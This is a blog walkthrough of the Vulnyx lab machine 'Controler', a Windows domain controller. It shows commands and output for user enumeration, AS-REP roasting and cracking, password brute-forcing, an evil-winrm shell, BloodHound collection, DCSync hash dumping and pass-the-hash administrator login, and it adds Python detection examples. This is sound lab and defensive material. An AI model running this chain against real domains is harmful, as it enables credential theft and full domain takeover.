Vulnyx-Controler

A Windows target machine.

Target IP: 192.168.56.117

Information Gathering


nmap:

nmap -T4 -A -v 192.168.56.117    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-11 04:32 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:32
Completed NSE at 04:32, 0.00s elapsed
Initiating NSE at 04:32
Completed NSE at 04:32, 0.00s elapsed
Initiating NSE at 04:32
Completed NSE at 04:32, 0.00s elapsed
Initiating ARP Ping Scan at 04:32
Scanning 192.168.56.117 [1 port]
Completed ARP Ping Scan at 04:32, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:32
Completed Parallel DNS resolution of 1 host. at 04:32, 0.04s elapsed
Initiating SYN Stealth Scan at 04:32
Scanning 192.168.56.117 [1000 ports]
Discovered open port 445/tcp on 192.168.56.117
Discovered open port 135/tcp on 192.168.56.117
Discovered open port 53/tcp on 192.168.56.117
Discovered open port 139/tcp on 192.168.56.117
Discovered open port 88/tcp on 192.168.56.117
Discovered open port 464/tcp on 192.168.56.117
Discovered open port 3269/tcp on 192.168.56.117
Discovered open port 3268/tcp on 192.168.56.117
Discovered open port 636/tcp on 192.168.56.117
Discovered open port 389/tcp on 192.168.56.117
Discovered open port 593/tcp on 192.168.56.117
Completed SYN Stealth Scan at 04:32, 1.46s elapsed (1000 total ports)
Initiating Service scan at 04:32
Scanning 11 services on 192.168.56.117
Completed Service scan at 04:32, 6.22s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.117
NSE: Script scanning 192.168.56.117.
Initiating NSE at 04:32
Completed NSE at 04:33, 8.34s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.09s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Nmap scan report for 192.168.56.117
Host is up (0.00053s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-11 23:32:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:AC:90:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CONTROLER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-06-11T23:32:52
|_ start_date: N/A
| nbstat: NetBIOS name: CONTROLER, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ac:90:5a (Oracle VirtualBox virtual NIC)
| Names:
| CONTROLER<00> Flags: <unique><active>
| CONTROL<00> Flags: <group><active>
| CONTROL<1c> Flags: <group><active>
| CONTROLER<20> Flags: <unique><active>
|_ CONTROL<1b> Flags: <unique><active>
|_clock-skew: 14h59m57s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.56.117

NSE: Script Post-scanning.
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds
Raw packets sent: 1148 (51.210KB) | Rcvd: 1017 (41.350KB)
nmap 192.168.56.117 --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-11 04:35 EDT
Nmap scan report for 192.168.56.117
Host is up (0.00040s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
MAC Address: 08:00:27:AC:90:5A (Oracle VirtualBox virtual NIC)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 41.07 seconds

Log in over SMB and see what is there.

nxc smb 192.168.56.117                                        
SMB 192.168.56.117 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)

That gives us a domain name; add it to the hosts file.

Try to collect user names.

ldapsearch -x -H ldap://192.168.56.117
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

┌──(root㉿kali)-[/home/kali/Desktop]
└─# rpcclient -U "" -N 192.168.56.117
rpcclient $> netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> netshareenumall
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> ^C

┌──(root㉿kali)-[/home/kali/Desktop]
└─# enum4linux -A 192.168.56.117
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 11 04:50:21 2025

=========================================( Target Information )=========================================

Target ........... 192.168.56.117
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


===========================( Enumerating Workgroup/Domain on 192.168.56.117 )===========================


[+] Got domain/workgroup name: CONTROL


==================================( Session Check on 192.168.56.117 )==================================


[+] Server 192.168.56.117 allows sessions using username '', password ''


===============================( Getting domain SID for 192.168.56.117 )===============================

Domain Name: CONTROL
Domain Sid: S-1-5-21-2142633474-2248127568-3584646925

[+] Host is part of a domain (not a workgroup)

enum4linux complete on Wed Jun 11 04:50:21 2025

No result; try brute-forcing user names instead.

(The username wordlists bundled with Kali find nothing here; you need one made specifically for user enumeration, downloaded from the internet.)

./kerbrute_linux_amd64 userenum -d control.nyx --dc 192.168.56.117 /usr/share/seclists/Usernames/A-Z.Surnames.txt                 

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/11/25 - Ronnie Flathers @ropnop

2025/06/11 05:05:02 > Using KDC(s):
2025/06/11 05:05:02 > 192.168.56.117:88

2025/06/11 05:05:02 > [+] VALID USERNAME: B.LEWIS@control.nyx
2025/06/11 05:05:08 > Done! Tested 13000 usernames (1 valid) in 6.136 seconds

We obtain one domain user.

AS-REP Roasting


Check whether this domain user has Kerberos pre-authentication disabled, and try to grab the hash.

impacket-GetNPUsers control.nyx/B.LEWIS -no-pass 
/usr/lib/python3/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for B.LEWIS
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$B.LEWIS@CONTROL.NYX:673f87866e1253733a78d827c8f76ac2$e746876ee8a2b48932bce457c461397d73700cc3eb7625aa9b93a650718753cae7b6a98a73714ca10b3fd380813a817df0bec981b9ae90a137d7810e0ad49a0c3dcc2681222f14338fa58f47e70dbdad8a8ba4e6c65bb3501beeffa74468e24f7c8fa3958af07d0fc03eff16ed59f10025d3705f7ccf55275777862dd59cde593f49475339b9efcf0cfd62806346d3c1e0a7a3b7fc4e4042de01e89fbd28c672e77735baae50064276a4e4979ad6c98dc03c8691d191b34e7c2cf28f26af322cf57aa3ba88fb643f8d937d582dfadac9928a5354cc4db8d1c2c81d28b4e4874628b6e46858feef80849b

john --format=krb5asrep --wordlist=rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
101Music ($krb5asrep$23$B.LEWIS@CONTROL.NYX)
1g 0:00:00:09 DONE (2025-06-11 05:15) 0.1006g/s 1353Kp/s 1353Kc/s 1353KC/s 101eagles..1019904
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
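Detection view of the two Kerberos steps above (the kerbrute user enumeration and the AS-REP roast), as an added example that is not part of the original writeup: it runs over constructed Windows Security event 4768 (TGT request) records using the field names of the 4768 EventData schema. The sample values, client IPs and thresholds are assumptions; on a real DC an enumeration sweep shows up as a burst of result code 0x6 (unknown principal) from one source, and a roastable account as a successful TGT with pre-auth type 0 and an RC4 ticket.

```python
from collections import defaultdict

# 4768 Result Code (Status) and EventData values referenced below.
KDC_OK = 0x0
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # name does not exist: what a userenum sweep leaves behind
NO_PREAUTH = 0                      # PreAuthType 0: TGT issued without pre-authentication
RC4_HMAC = 0x17                     # TicketEncryptionType 0x17, the etype 23 in $krb5asrep$23$
FAILED_ETYPE = 0xFFFFFFFF           # logged for failed requests

SAMPLE_4768 = [
    # Constructed burst: 12 unknown principals from one client inside 12 seconds.
    *({"ts": 1000 + i, "user": f"probe{i}", "status": KDC_ERR_C_PRINCIPAL_UNKNOWN,
       "preauth": None, "etype": FAILED_ETYPE, "ip": "10.0.0.5"} for i in range(12)),
    # Constructed normal logon: pre-auth type 2 (encrypted timestamp), AES256 ticket.
    {"ts": 1015, "user": "j.levy", "status": KDC_OK, "preauth": 2, "etype": 0x12, "ip": "10.0.0.7"},
    # Constructed roastable account: success with no pre-auth and an RC4 ticket.
    {"ts": 1016, "user": "b.lewis", "status": KDC_OK, "preauth": NO_PREAUTH, "etype": RC4_HMAC, "ip": "10.0.0.5"},
]

def enumeration_bursts(events, threshold=10, window=60):
    """Map source IP -> largest number of unknown-principal failures it produced
    inside any `window`-second span, for sources that reach `threshold`."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[e["ip"]].append(e["ts"])
    hits = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits

def asrep_roast_candidates(events):
    """Successful TGTs issued without pre-auth and with RC4: exactly the material
    an attacker takes offline to crack, so each (source, account) pair deserves a look."""
    return [(e["ip"], e["user"]) for e in events
            if e["status"] == KDC_OK and e["preauth"] == NO_PREAUTH and e["etype"] == RC4_HMAC]
```

The roast check also points at the fix: clearing "Do not require Kerberos preauthentication" on the account removes the condition entirely.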

Try to get a shell over WinRM; no luck.

 nxc winrm 192.168.56.117 -u b.lewis -p 101Music
WINRM 192.168.56.117 5985 CONTROLER [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
WINRM 192.168.56.117 5985 CONTROLER [-] control.nyx\b.lewis:101Music

Log in over SMB and list the domain users.

crackmapexec smb 192.168.56.117 -u B.LEWIS -p '101Music' --users
SMB 192.168.56.117 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB 192.168.56.117 445 CONTROLER [+] control.nyx\B.LEWIS:101Music
SMB 192.168.56.117 445 CONTROLER [+] Enumerated domain user(s)
SMB 192.168.56.117 445 CONTROLER control.nyx\a.hansen badpwdcount: 1 desc: (Account Disabled)
SMB 192.168.56.117 445 CONTROLER control.nyx\d.petrov badpwdcount: 1 desc: (Account Disabled)
SMB 192.168.56.117 445 CONTROLER control.nyx\m.klein badpwdcount: 1 desc: (Account Disabled)
SMB 192.168.56.117 445 CONTROLER control.nyx\b.lewis badpwdcount: 0 desc: (Account Enabled)
SMB 192.168.56.117 445 CONTROLER control.nyx\j.levy badpwdcount: 0 desc: (Account Enabled)
SMB 192.168.56.117 445 CONTROLER control.nyx\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 192.168.56.117 445 CONTROLER control.nyx\Guest badpwdcount: 0 desc: (Account Disabled)
SMB 192.168.56.117 445 CONTROLER control.nyx\Administrator badpwdcount: 0 desc: (Account Enabled)

The user J.Levy is also enabled.

Brute-force the password.

crackmapexec smb 192.168.56.117 -u j.levy -p rockyou.txt         
SMB 192.168.56.117 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB 192.168.56.117 445 CONTROLER [-] control.nyx\j.levy:123456 STATUS_LOGON_FAILURE
SMB 192.168.56.117 445 CONTROLER [-] control.nyx\j.levy:12345 STATUS_LOGON_FAILURE
.......
SMB 192.168.56.117 445 CONTROLER [+] control.nyx\j.levy:Password1

We get the password Password1.

A shell can be obtained over WinRM.

nxc winrm 192.168.56.117 -u j.levy -p Password1
WINRM 192.168.56.117 5985 CONTROLER [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
WINRM 192.168.56.117 5985 CONTROLER [+] control.nyx\j.levy:Password1 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 192.168.56.117 -u 'j.levy' -p "Password1"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.levy\Documents>

Get the user flag.

*Evil-WinRM* PS C:\Users\j.levy\Documents> dir
*Evil-WinRM* PS C:\Users\j.levy\Documents> cd ..
*Evil-WinRM* PS C:\Users\j.levy> cd Desktop
*Evil-WinRM* PS C:\Users\j.levy\Desktop> dir


Directory: C:\Users\j.levy\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/22/2024 2:40 PM 70 user.txt


*Evil-WinRM* PS C:\Users\j.levy\Desktop> cat user.txt
587c4dac7a29c5c2a2d98732116e5bee
*Evil-WinRM* PS C:\Users\j.levy\Desktop>

GetAdmin


Analyze the domain with BloodHound: upload SharpHound.

*Evil-WinRM* PS C:\Users\j.levy\Documents> upload /home/kali/Desktop/SharpHound.exe

Info: Uploading /home/kali/Desktop/SharpHound.exe to C:\Users\j.levy\Documents\SharpHound.exe

Data: 1715540 bytes of 1715540 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\j.levy\Documents> .\SharpHound.exe -c All -d control.nyx
2025-06-11T17:40:46.0437737-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-06-11T17:40:46.1687827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-06-11T17:40:46.1687827-07:00|INFORMATION|Initializing SharpHound at 5:40 PM on 6/11/2025
2025-06-11T17:40:46.3583738-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-06-11T17:40:46.3867934-07:00|INFORMATION|Beginning LDAP search for control.nyx
2025-06-11T17:40:46.4974100-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONTROL.NYX
2025-06-11T17:40:46.5902495-07:00|INFORMATION|Beginning LDAP search for control.nyx Configuration NC
2025-06-11T17:40:46.5902495-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-06-11T17:40:46.5902495-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-06-11T17:40:46.7156535-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONTROL.NYX
2025-06-11T17:40:46.9349151-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONTROL.NYX
2025-06-11T17:40:52.4847691-07:00|INFORMATION|Consumers finished, closing output channel
2025-06-11T17:40:52.5245244-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-06-11T17:40:52.5968654-07:00|INFORMATION|Status: 298 objects finished (+298 49.66667)/s -- Using 39 MB RAM
2025-06-11T17:40:52.5968654-07:00|INFORMATION|Enumeration finished in 00:00:06.1712809
2025-06-11T17:40:52.6228715-07:00|INFORMATION|Saving cache with stats: 15 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2025-06-11T17:40:52.6228715-07:00|INFORMATION|SharpHound Enumeration Completed at 5:40 PM on 6/11/2025! Happy Graphing!
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir


Directory: C:\Users\j.levy\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/11/2025 5:40 PM 25769 20250611174047_BloodHound.zip
-a---- 6/11/2025 5:40 PM 1288 MWMwNWZhMWQtNWU5Yi00ZGZhLTgzZDEtMDE5NjRmMmE2NWEw.bin
-a---- 6/11/2025 5:39 PM 1286656 SharpHound.exe


*Evil-WinRM* PS C:\Users\j.levy\Documents> download 20250611174047_BloodHound.zip

Info: Downloading C:\Users\j.levy\Documents\20250611174047_BloodHound.zip to 20250611174047_BloodHound.zip

Info: Download successful!

It works out for us that this user can perform a DCSync attack, and even thoughtfully provides the command.

impacket-secretsdump 'control.nyx'/'j.levy':'Password1'@'192.168.56.117' -just-dc-user administrator
/usr/lib/python3/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a8c983c709e851258912c3b1d71c9b05faf1724f522b4f32e57f7bef3366773
Administrator:aes128-cts-hmac-sha1-96:0ca176565c5b47fda5e2ab4f53fbb9d3
Administrator:des-cbc-md5:ce9785d980c1a7f8
[*] Cleaning up...
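The DCSync edge BloodHound reported above is derived from the ACL on the domain head. The added example below (not code from the writeup or from BloodHound) implements that rule over a constructed ACL and group map: a principal needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, held directly or through group membership, with explicit denies honoured, and anything outside the default holders is a finding. The trustees, the "Sync Team" group and the membership path for j.levy are assumptions for illustration; the writeup does not show the real ACL of control.nyx.

```python
# Replication control-access rights on the domain head (rightsGuid values from the schema).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
ALL_RIGHTS = "00000000-0000-0000-0000-000000000000"   # empty ObjectType: every extended right
DCSYNC_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
# Trustees that hold these rights on a domain head by default; anyone else is a finding.
EXPECTED = {"Domain Controllers", "Enterprise Domain Controllers", "Administrators",
            "Domain Admins", "Enterprise Admins", "SYSTEM"}

# Constructed control-access ACEs on the domain head: (trustee, allow?, right GUID).
# Not the real ACL of control.nyx, which the writeup does not show.
SAMPLE_ACL = [
    ("Domain Controllers", True, DS_REPL_GET_CHANGES),
    ("Domain Controllers", True, DS_REPL_GET_CHANGES_ALL),
    ("Administrators", True, ALL_RIGHTS),
    ("Backup Operators", True, DS_REPL_GET_CHANGES),       # one right only: cannot DCSync
    ("Sync Team", True, DS_REPL_GET_CHANGES),              # a custom group with both rights
    ("Sync Team", True, DS_REPL_GET_CHANGES_ALL),
    ("svc-sync", False, DS_REPL_GET_CHANGES_ALL),          # explicit deny on one member
]
# Constructed direct memberships: principal -> groups it belongs to.
SAMPLE_GROUPS = {"j.levy": {"Sync Team"}, "svc-sync": {"Sync Team"},
                 "Sync Team": {"Domain Users"}, "b.lewis": {"Domain Users"}}

def effective_principals(principal, groups):
    """The principal plus every group it belongs to, transitively."""
    seen, stack = set(), [principal]
    while stack:
        p = stack.pop()
        if p not in seen:
            seen.add(p)
            stack.extend(groups.get(p, ()))
    return seen

def replication_rights(principal, acl, groups):
    """Replication rights the principal effectively holds. Explicit denies are
    applied before allows, as AD orders them (inheritance is not modelled)."""
    ids = effective_principals(principal, groups)
    denied = {guid for t, allow, guid in acl if not allow and t in ids}
    if ALL_RIGHTS in denied:
        return set()
    granted = set()
    for t, allow, guid in acl:
        if allow and t in ids:
            granted |= DCSYNC_RIGHTS if guid == ALL_RIGHTS else {guid}
    return granted - denied

def can_dcsync(principal, acl, groups):
    """The DCSync rule: both replication rights are required."""
    return DCSYNC_RIGHTS <= replication_rights(principal, acl, groups)

def dcsync_findings(acl, groups):
    """Every known principal that can DCSync and is not an expected default holder."""
    known = {t for t, _, _ in acl} | set(groups)
    return sorted(p for p in known if p not in EXPECTED and can_dcsync(p, acl, groups))
```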

We successfully grab the domain administrator's hash; finally, just log in with evil-winrm.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 192.168.56.117 -u 'administrator' -H "48b20d4f3ea31b7234c92b71c90fbff7"

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/22/2024 2:41 PM 70 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b43e4c1b7df273b73966bc038774bafd
*Evil-WinRM* PS C:\Users\Administrator\Desktop>


http://example.com/2025/06/11/Vulnyx-Controler/
Author: Skyarrow
Posted on: June 11, 2025